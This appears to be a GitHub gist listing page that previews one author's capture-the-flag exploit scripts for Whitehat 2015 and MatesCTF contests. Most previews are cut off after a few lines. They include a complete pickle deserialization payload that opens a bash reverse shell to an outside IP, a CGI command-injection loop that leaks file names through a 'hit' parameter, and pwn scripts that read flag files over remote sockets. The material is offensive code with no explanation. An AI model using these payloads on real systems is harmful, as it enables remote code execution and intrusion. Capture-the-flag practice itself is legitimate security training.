Peter Nguyen peternguyen93
peternguyen93
/ Whitehat_2015_pwn200.py
Created
October 28, 2015 02:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| # p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337) | |
| # p = Pwn(port=1337) | |
| def exploit(): | |
| cmd = 'cat flag.txt >&4;ls -lia >&4;' |
peternguyen93
/ Whitehat_2015_pwn300.py
Created
October 28, 2015 02:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| from capstone import * | |
| p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337) | |
| def xor(msg): |
peternguyen93
/ Whitehat_2015_pwn500.py
Created
October 28, 2015 02:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| def exploit(): | |
| # raw_input('Debug>') | |
| while 1: |
peternguyen93
/ Whitehat_2015_web100.py
Created
October 28, 2015 02:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib, urllib2 | |
| import string | |
| import socket | |
| url = 'http://lab5b.grandprix.whitehatvn.com/cgi-bin/web13377331.py?input=0x1337' | |
| flag = '' | |
| regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX' | |
| i = 1 | |
| charset = string.letters + string.digits + '_' | |
| while 1: |
peternguyen93
/ Whitehat_2015_web200.py
Created
October 28, 2015 02:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib, urllib2 | |
| import pickle | |
| url = 'http://lab13.grandprix.whitehatvn.com/b3acec105de421e136aad4024ee45b63.php?data=' | |
| shell = "cos\nsystem\n(S'bash -i >& /dev/tcp/128.199.171.28/8081 0>&1'\ntR." | |
| tmp = url + urllib.quote_plus(shell) | |
| req = urllib2.urlopen(tmp) |
peternguyen93
/ Whitehat_2015_web300.py
Created
October 28, 2015 03:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| cmd ='printf "%s|" /*' | |
| # cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3' | |
| for i in xrange(400): | |
| a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;') | |
| print chr(int(a.text.split(" ")[1].split("}")[0])), | |
| ''' | |
| for fd in xrange(100): |
peternguyen93
/ matesctf_round2_fruit.py
Created
November 29, 2015 05:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| p = Pwn(mode = 1,host='lab02.matesctf.org',port=4231) | |
| # p = Pwn(mode=1) | |
| def exploit(): | |
| p.connect() |
peternguyen93
/ matesctf_round2_fruit2.py
Created
November 29, 2015 05:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| p = Pwn(mode = 1,host='lab03.matesctf.org',port=4321) | |
| # p = Pwn(mode=1) | |
| def exploit(): | |
| p.connect() |
peternguyen93
/ matectf_round2_login_server.py
Created
November 29, 2015 05:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| p = Pwn(host='lab01.matesctf.org',port=4001) | |
| def login(buf): | |
| p.read_until('>') |
peternguyen93
/ [MatesCTF_Round3]_Pwn300.py
Created
January 24, 2016 04:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| import re | |
| # p = Pwn(elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') | |
| p = Pwn(host='lab01.matesctf.org',port=1337,elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') |